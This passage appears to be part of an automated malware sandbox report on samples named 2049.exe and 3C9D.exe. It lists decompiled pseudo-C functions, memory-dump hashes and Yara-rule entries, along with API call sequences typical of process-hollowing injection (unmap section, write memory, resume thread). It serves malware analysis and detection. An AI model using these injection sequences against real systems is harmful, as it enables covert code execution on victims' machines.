                                                                                                                            0x00402afe
                                                                                                                            0x00402aff
                                                                                                                            0x00402b00
                                                                                                                            0x00402b02
                                                                                                                            0x00402b05
                                                                                                                            0x00402b0b

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.492037836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 38ad5de6cc25e238ca772a8d165a14268aad872a468d94c481cb051d14e6d1b8
                                                                                                                            • Instruction ID: 7fe242a26a87a4f58b180528eeead1ac373e7822ac378e6f41f12b53d01bde8d
                                                                                                                            • Opcode Fuzzy Hash: 38ad5de6cc25e238ca772a8d165a14268aad872a468d94c481cb051d14e6d1b8
                                                                                                                            • Instruction Fuzzy Hash: 4A21DB35208145EADF12AE618F5E9AA37349F10344F2400FBAD01751E2DBFD9B02BA1F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402AEB, Relevance: .1, Instructions: 57COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E00402AEB(void* __ebx, void* __edx, void* __edi, void* __fp0) {
				void* _t15;

				_t15 = __ebx;
				while(1) {
					_push(0xad);
					asm("lodsd");
					 *0x2b10 =  *0x2b10 + 0x2b10;
					 *0x0000005D =  *((intOrPtr*)(0x5d)) + _t15;
					__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				}
			}




                                                                                                                            0x00402aeb
                                                                                                                            0x00402aed
                                                                                                                            0x00402afe
                                                                                                                            0x00402aff
                                                                                                                            0x00402b00
                                                                                                                            0x00402b02
                                                                                                                            0x00402b0b
                                                                                                                            0x00402b0b

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.492037836.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0b23133ebc1994eb64dd26a5a6fc160ed452d82aaa0270aa4bfa54eac37b8cc9
                                                                                                                            • Instruction ID: 703404f178dd1594a4d59af797b8ce1b5d4eb18bb8309dbacaae7544c7f15ca3
                                                                                                                            • Opcode Fuzzy Hash: 0b23133ebc1994eb64dd26a5a6fc160ed452d82aaa0270aa4bfa54eac37b8cc9
                                                                                                                            • Instruction Fuzzy Hash: 0A11FE30604106EADF12BE518B5ED7A3335AF10344F2000BBAD02751E1DBFDAB12B61B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Analysis Process: 2049.exe PID: 6148 Parent PID: 3292 2049.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 059C13F8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 513memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 059C1BAB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID: dl>l
                                                                                                                            • API String ID: 2167126740-3507272450
                                                                                                                            • Opcode ID: d54330aafb3c0c605362a608ca8aa02a417588ca31f855d76351b13941e55d25
                                                                                                                            • Instruction ID: 2b2914c7b313d7698b5413f5897915a91703d683fe0302917b04dee1b1929eb0
                                                                                                                            • Opcode Fuzzy Hash: d54330aafb3c0c605362a608ca8aa02a417588ca31f855d76351b13941e55d25
                                                                                                                            • Instruction Fuzzy Hash: FB120F24B102108FCB18DF608109A6E7AF6FF85348B56949EC4099F737EBB5C949C79B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C1C00, Relevance: 1.9, APIs: 1, Instructions: 360nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 059C2167
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryVirtualWrite
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3527976591-0
                                                                                                                            • Opcode ID: 7c5e10d884c2e10b3cfd4cb8e60f628bcc904a811dd58cb9f9884ed8980cf878
                                                                                                                            • Instruction ID: b81c2ea3ca2ac1503a063ebc252674db532251591bc3118207bc5ef943b2c666
                                                                                                                            • Opcode Fuzzy Hash: 7c5e10d884c2e10b3cfd4cb8e60f628bcc904a811dd58cb9f9884ed8980cf878
                                                                                                                            • Instruction Fuzzy Hash: B4E17B64A103148ECB15CF648148A6EBBF6FF45308F56949FC0099F632E7B2CA49C79B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C0FD8, Relevance: 1.7, APIs: 1, Instructions: 234nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 059C13A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: 4efcac9f361846ff51d5def575efcf6c17e5756862beb771d8676cd3edb1c1eb
                                                                                                                            • Instruction ID: 704601f775e998594162a6f88487ae4ff89afdd00d1f37697dc92dc7ff06ce8e
                                                                                                                            • Opcode Fuzzy Hash: 4efcac9f361846ff51d5def575efcf6c17e5756862beb771d8676cd3edb1c1eb
                                                                                                                            • Instruction Fuzzy Hash: 07A11564A2034089C725CF50824895E6BF6FF45348B96A5CEC4182FA37E3B6C689C79F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C2270, Relevance: 1.7, APIs: 1, Instructions: 211nativethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 059C25A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 9b8f3e92ff84bc4b89b024667dfd625f0c54e05ac2494126cd777f4c4bd159c3
                                                                                                                            • Instruction ID: 044f5e4411cf23ef07ce5a89d6ed3099d4e2a5c856a569e0b8b712a1a1c0c0c8
                                                                                                                            • Opcode Fuzzy Hash: 9b8f3e92ff84bc4b89b024667dfd625f0c54e05ac2494126cd777f4c4bd159c3
                                                                                                                            • Instruction Fuzzy Hash: C9913724A203408ECB258F50C258A5E7BF2FF45748F56A0CEC4556F636E3B6C649C79B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C25E9, Relevance: 1.6, APIs: 1, Instructions: 69nativethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 059C25A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 6196e4ca435747312240219d20a0a6d6528958e70c1732a0247ebcc51dbebdf5
                                                                                                                            • Instruction ID: 518350718c243f291e2aadc0461c60492fb948b8fab5030207aad30b15f44108
                                                                                                                            • Opcode Fuzzy Hash: 6196e4ca435747312240219d20a0a6d6528958e70c1732a0247ebcc51dbebdf5
                                                                                                                            • Instruction Fuzzy Hash: 0121057AA042448FDB10DBF894157EEBBEAEF84311F04886ED04AE7651DB348906CB92
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C1B20, Relevance: 1.6, APIs: 1, Instructions: 61memorynativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 059C1BAB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2167126740-0
                                                                                                                            • Opcode ID: f98c6c4c4136ae8845201ddf46cf393d85f1bfc03528304d0ee5da741684a582
                                                                                                                            • Instruction ID: 7c15cad80ddd94c9b43c9b56d31ab10e7aa3d7224539e70d4a0c55f6dc6cfc73
                                                                                                                            • Opcode Fuzzy Hash: f98c6c4c4136ae8845201ddf46cf393d85f1bfc03528304d0ee5da741684a582
                                                                                                                            • Instruction Fuzzy Hash: 97214571900209CFDB10CFA9C445AEEBBF5FF88314F10882EE919A7610D7799945DF95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C2538, Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtResumeThread.NTDLL(?,?), ref: 059C25A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: ResumeThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 947044025-0
                                                                                                                            • Opcode ID: 01096cf672994958e1d2c75ed6729b6a9789eb564d9261a75008b8bd983f368e
                                                                                                                            • Instruction ID: ffc5cf18f94bb4bb27444814affd85f71c5996147f3aff5801ae55f18a7d19ee
                                                                                                                            • Opcode Fuzzy Hash: 01096cf672994958e1d2c75ed6729b6a9789eb564d9261a75008b8bd983f368e
                                                                                                                            • Instruction Fuzzy Hash: CC11C4B1D003498ADB10DFAAC484AEFFBF9AF88214F54842ED559B7240D778A945CFA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C1340, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 059C13A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: 1e5c2aa592f38d3118c25bfa02978491a362929885a9467b14edc07457dd8ea2
                                                                                                                            • Instruction ID: a0c77dcfe594c5035f26ad095d5b74dbc5328e519d703ac4d677858b93cc93f9
                                                                                                                            • Opcode Fuzzy Hash: 1e5c2aa592f38d3118c25bfa02978491a362929885a9467b14edc07457dd8ea2
                                                                                                                            • Instruction Fuzzy Hash: 34110771D002498BDB10DFA9C444BDEBBF9EB88218F14882ED515A7640D775A944CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C0190, Relevance: .4, Instructions: 420COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4ebf75d955276f1d3343ed78b89496dd0079a3e282eb0e52ef165e85b0f45f86
                                                                                                                            • Instruction ID: 74e6434175b0ed994242b2ad4772e61c4a4a3dbb93b1ac63fd3bc7d0eeaf4afc
                                                                                                                            • Opcode Fuzzy Hash: 4ebf75d955276f1d3343ed78b89496dd0079a3e282eb0e52ef165e85b0f45f86
                                                                                                                            • Instruction Fuzzy Hash: 90E17F31F00218CBDB64CE69CD547ADBAB3BFC8214F1882ADD55ADB381DB3499468B52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C06D8, Relevance: 1.6, APIs: 1, Instructions: 145processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,?,0000000A,?,?,?,?,?,?,?), ref: 059C0846
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: a53ecd2b9c2491f1308a726d5346781d59eab7488f71232a58f754d39bc63d13
                                                                                                                            • Instruction ID: 02c3cc3a1ef1b12b312d8b696a99858c61551791250598970284a8c801be968b
                                                                                                                            • Opcode Fuzzy Hash: a53ecd2b9c2491f1308a726d5346781d59eab7488f71232a58f754d39bc63d13
                                                                                                                            • Instruction Fuzzy Hash: 78511371D01269DFDB24CFA5C944BDEBBB5BF48304F0484AAE909B7250DB359A85CFA0
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 059C06D3, Relevance: 1.6, APIs: 1, Instructions: 145processCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateProcessInternalW.KERNEL32(?,?,?,?,0000000A,?,?,?,?,?,?,?), ref: 059C0846
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInternalProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2186235152-0
                                                                                                                            • Opcode ID: 9d58477cd1ec7a4193e353f2cf393dd78dcda0b5c9e71aeb6760f8aa9898b023
                                                                                                                            • Instruction ID: e2da09f46e364ae436742b4709ffeb2118a0b22afbdb7f99d220f4d9f3f5b6ff
                                                                                                                            • Opcode Fuzzy Hash: 9d58477cd1ec7a4193e353f2cf393dd78dcda0b5c9e71aeb6760f8aa9898b023
                                                                                                                            • Instruction Fuzzy Hash: 6A511371D01269DFDB24CFA5C944BDEBBB5BF48304F0484AAE909B7250DB359A85CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 059C018F, Relevance: .2, Instructions: 237COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001C.00000002.509362200.00000000059C0000.00000040.00000010.sdmp, Offset: 059C0000, based on PE: false
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ad01617bd326628131c5a5fd016a4615d8e13ddc1eb47d3efbbc469db476976a
                                                                                                                            • Instruction ID: 6ebe9fb59e173b76e64e15c6db65e23f7109f7087fad7679966218c0765a710b
                                                                                                                            • Opcode Fuzzy Hash: ad01617bd326628131c5a5fd016a4615d8e13ddc1eb47d3efbbc469db476976a
                                                                                                                            • Instruction Fuzzy Hash: 61819231F00218CBDB54CEA9CD943AEBAE3AFC8204F1881BDD549EB745EB3499459B52
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: 3C9D.exe PID: 5908 Parent PID: 3292 3C9D.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 004017A3, Relevance: 3.1, APIs: 2, Instructions: 56sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 37%
                                                                                                                            			E004017A3(signed int __edx, void* __edi, void* __esi, void* __fp0) {

				asm("wait");
				 *(0x7684bd6c + __edx * 4) =  *(0x7684bd6c + __edx * 4) >> 1;
			}



                                                                                                                            0x004017a6
                                                                                                                            0x004017aa

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401859
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.429729264.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: aa6c66ade1839c057e54ed95590a2b4f703699917ec1c7b6b3ca2d20bc3bc55b
                                                                                                                            • Instruction ID: 5bd60c2b3e8a068e4466346cbc0defb5667620a0c4f183a3ee32389aea7e8ad2
                                                                                                                            • Opcode Fuzzy Hash: aa6c66ade1839c057e54ed95590a2b4f703699917ec1c7b6b3ca2d20bc3bc55b
                                                                                                                            • Instruction Fuzzy Hash: 3E01C033648100EBE700BA909C42E6A3325AF00700F24C137FA53BA1E1C63EDB22975B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040181C, Relevance: 3.1, APIs: 2, Instructions: 55sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 15%
                                                                                                                            			E0040181C(void* __edx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t20;
				void* _t21;
				void* _t24;

				_t19 = __edx;
				_t8 = 0x1851;
				__eax = __eax + 0xf4ebce62;
				__eflags = __eax;
				_push(0x66);
				L0040115A(_t8, __edx, _t20, _t21, _t24);
				_t17 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t17); // executed
				_t11 = E004013A0(_t17, _t20, _t21); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L0040146D(_t17, _t19, _t20, _t21); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_push(0x1851);
				asm("les eax, [ebx+ebp*8]");
				_push(0x66);
				__esp = __esp + 4;
				return __eax;
			}













                                                                                                                            0x0040181c
                                                                                                                            0x00401830
                                                                                                                            0x00401832
                                                                                                                            0x00401832
                                                                                                                            0x0040183d
                                                                                                                            0x0040184c
                                                                                                                            0x00401851
                                                                                                                            0x00401859
                                                                                                                            0x0040185f
                                                                                                                            0x00401860
                                                                                                                            0x00401863
                                                                                                                            0x00401866
                                                                                                                            0x00401867
                                                                                                                            0x0040186e
                                                                                                                            0x00401870
                                                                                                                            0x00401873
                                                                                                                            0x00401876
                                                                                                                            0x00401877
                                                                                                                            0x00401878
                                                                                                                            0x00401878
                                                                                                                            0x00401881
                                                                                                                            0x0040188b
                                                                                                                            0x00401894
                                                                                                                            0x004018a3
                                                                                                                            0x004018a8
                                                                                                                            0x004018bb

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401859
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.429729264.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 9681a1767b4d508f443fed0373f5985461e0c9db55eb61caf3868fd7a20a383e
                                                                                                                            • Instruction ID: 0d4c73ff1a25ccc0af209e25dff701d5f0484e4d803941be834223819e423ed0
                                                                                                                            • Opcode Fuzzy Hash: 9681a1767b4d508f443fed0373f5985461e0c9db55eb61caf3868fd7a20a383e
                                                                                                                            • Instruction Fuzzy Hash: DA019E33608204EBE7007A949D46D6A3329EF04714F24C137FA07791E1D63E9B22A76B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401828, Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 36%
                                                                                                                            			E00401828(void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t22;
				void* _t25;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				asm("enter 0xdd16, 0x68");
				_t8 = 0x1851;
				__eax = __eax + 0xf4ebce62;
				__eflags = __eax;
				_push(0x66);
				L0040115A(_t8, __edx, __edi, __esi, _t25);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_push(_t22 - 4);
				_push( *((intOrPtr*)(_t22 + 0x10)));
				_push( *((intOrPtr*)(_t22 + 0xc)));
				_push(_t17); // executed
				_t11 = E004013A0(_t17, _t20, _t21); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L0040146D(_t17, _t19, _t20, _t21); // executed
				}
				 *_t17(); // executed
				asm("les eax, [ebx+ebp*8]");
				__esp = __esp + 4;
				__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
				__edi = 0x66;
				__esi = 0x1851;
				__ebx = 0xffffffff;
				__esp = __ebp;
				__ebp = 0;
				return __eax;
			}








                                                                                                                            0x00401828
                                                                                                                            0x00401828
                                                                                                                            0x00401828
                                                                                                                            0x00401828
                                                                                                                            0x00401830
                                                                                                                            0x00401832
                                                                                                                            0x00401832
                                                                                                                            0x0040183d
                                                                                                                            0x0040184c
                                                                                                                            0x00401851
                                                                                                                            0x00401859
                                                                                                                            0x0040185f
                                                                                                                            0x00401860
                                                                                                                            0x00401863
                                                                                                                            0x00401866
                                                                                                                            0x00401867
                                                                                                                            0x0040186e
                                                                                                                            0x00401870
                                                                                                                            0x00401873
                                                                                                                            0x00401876
                                                                                                                            0x00401877
                                                                                                                            0x00401878
                                                                                                                            0x00401878
                                                                                                                            0x00401881
                                                                                                                            0x00401894
                                                                                                                            0x004018a8
                                                                                                                            0x004018b2
                                                                                                                            0x004018b7
                                                                                                                            0x004018b8
                                                                                                                            0x004018b9
                                                                                                                            0x004018ba
                                                                                                                            0x004018ba
                                                                                                                            0x004018bb

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401859
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.429729264.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 42bf2d18fab82c1cf26c6973a5f326e6893aee6dc713cdbf8bdbea5eda66952d
                                                                                                                            • Instruction ID: b329b9df0df391f908064f7b6fb4b650575042adab4467ec8a7c1b58a8870e1c
                                                                                                                            • Opcode Fuzzy Hash: 42bf2d18fab82c1cf26c6973a5f326e6893aee6dc713cdbf8bdbea5eda66952d
                                                                                                                            • Instruction Fuzzy Hash: F701B533648200EBE700BB909C42E6A37259F04701F248137FA53791E1D63ED722E72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004017DA, Relevance: 3.0, APIs: 2, Instructions: 49sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 43%
                                                                                                                            			E004017DA(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t31;
				void* _t39;
				signed int _t40;

				L0:
				while(1) {
					_t31 = __edi;
					_t16 = __eax;
					__eax = __esp;
					__esp = _t16;
					_t17 = __eax;
					__eax = _t16;
					__esp = _t17;
					__eax = __edi * 0xffffff88;
					__eflags = __eax;
					if(__eflags >= 0) {
						L21:
						_push(0x66);
						__esp = __esp + 4;
						L23:
						__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
						__ebx =  *((intOrPtr*)(__ebp + 8));
						Sleep(0x1388);
						__eax = __ebp - 4;
						_push(__ebp - 4);
						_push( *((intOrPtr*)(__ebp + 0x10)));
						_push( *((intOrPtr*)(__ebp + 0xc)));
						_push(__ebx); // executed
						__eax = E004013A0(__ebx, __edi, __esi); // executed
						__eflags = __eax;
						if(__eax != 0) {
							L24:
							_push( *((intOrPtr*)(__ebp + 0x14)));
							_push( *(__ebp - 4));
							L25:
							_push(__eax);
							_push(__ebx); // executed
							__eax = L0040146D(__ebx, __edx, __edi, __esi); // executed
						}
						L26:
						__eax =  *__ebx(0xffffffff, 0); // executed
						L29:
						L27:
						_push(0x1851);
						__eax =  *__esp;
						L28:
						__al = __al & 0x00000083;
						asm("les eax, [ebx+ebp*8]");
						__eax = __eax + 0xefeb0eeb;
						__eflags = __eax;
						L30:
						L35:
						L31:
						_push(0x66);
						L32:
						L33:
						__esp = __esp + 4;
						L34:
						L36:
						__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						L14:
						_push(0x867f6b6b);
						goto 0x363cf8f5;
						asm("adc byte [esp+edx*4+0x17b0901f], 0x50");
						if(__eflags > 0) {
							L5:
							asm("stosb");
							_t5 = __eax;
							__eax = __esp;
							__esp = _t5;
							asm("loopne 0xffffffbe");
							_pop(ds);
							asm("stosb");
							_pop(ds);
							asm("ficom dword [eax+0x459c7d17]");
							if(__eflags < 0) {
								L6:
								_push(__edx);
								asm("pushfd");
								asm("movsd");
								_push(__esp);
								asm("repne cmp [0x9494a494], edi");
								asm("loopne 0xffffff9a");
								L7:
								asm("wait");
								_t6 = __eax;
								__eax = __esp;
								__esp = _t6;
								_t7 = __eax;
								__eax = _t6;
								__esp = _t7;
								__eax = __edi;
								__edi = _t6;
								_t10 = 0x7684bd6c + __edx * 4;
								 *_t10 =  *(0x7684bd6c + __edx * 4) >> 1;
								__eflags =  *_t10;
							}
							L8:
							__ebp = 0x7f737684;
						} else {
							L15:
							if (__eflags >= 0) goto L11;
							L16:
							asm("xlatb");
						}
					}
					L37:
				}
				L3:
				_t4 = _t31;
				_t31 = _t39;
				_t39 = _t4;
				if(_t40 > 0) {
					_t2 = _t31 + 0xe;
					 *_t2 =  *(_t31 + 0xe) << 0x4d;
					_t40 =  *_t2;
					asm("cmpsd");
					goto L3;
				}
				return _t31;
				goto L37;
			}






                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x004017da
                                                                                                                            0x004017db
                                                                                                                            0x004017db
                                                                                                                            0x004017db
                                                                                                                            0x004017dc
                                                                                                                            0x004017dc
                                                                                                                            0x004017dc
                                                                                                                            0x004017dd
                                                                                                                            0x004017dd
                                                                                                                            0x004017e0
                                                                                                                            0x0040183d
                                                                                                                            0x0040183d
                                                                                                                            0x00401842
                                                                                                                            0x0040184c
                                                                                                                            0x0040184c
                                                                                                                            0x00401851
                                                                                                                            0x00401859
                                                                                                                            0x0040185c
                                                                                                                            0x0040185f
                                                                                                                            0x00401860
                                                                                                                            0x00401863
                                                                                                                            0x00401866
                                                                                                                            0x00401867
                                                                                                                            0x0040186c
                                                                                                                            0x0040186e
                                                                                                                            0x00401870
                                                                                                                            0x00401870
                                                                                                                            0x00401873
                                                                                                                            0x00401876
                                                                                                                            0x00401876
                                                                                                                            0x00401877
                                                                                                                            0x00401878
                                                                                                                            0x00401878
                                                                                                                            0x0040187d
                                                                                                                            0x00401881
                                                                                                                            0x0040189a
                                                                                                                            0x0040188b
                                                                                                                            0x0040188b
                                                                                                                            0x00401890
                                                                                                                            0x00401892
                                                                                                                            0x00401892
                                                                                                                            0x00401894
                                                                                                                            0x00401897
                                                                                                                            0x00401897
                                                                                                                            0x0040189d
                                                                                                                            0x004018af
                                                                                                                            0x004018a3
                                                                                                                            0x004018a3
                                                                                                                            0x004018a4
                                                                                                                            0x004018a8
                                                                                                                            0x004018a8
                                                                                                                            0x004018ab
                                                                                                                            0x004018b2
                                                                                                                            0x004018b2
                                                                                                                            0x004018b7
                                                                                                                            0x004018b8
                                                                                                                            0x004018b9
                                                                                                                            0x004018ba
                                                                                                                            0x004018ba
                                                                                                                            0x004018bb
                                                                                                                            0x004017e2
                                                                                                                            0x004017e2
                                                                                                                            0x004017e2
                                                                                                                            0x004017e7
                                                                                                                            0x004017ec
                                                                                                                            0x004017f5
                                                                                                                            0x00401788
                                                                                                                            0x00401788
                                                                                                                            0x00401789
                                                                                                                            0x00401789
                                                                                                                            0x00401789
                                                                                                                            0x0040178a
                                                                                                                            0x0040178c
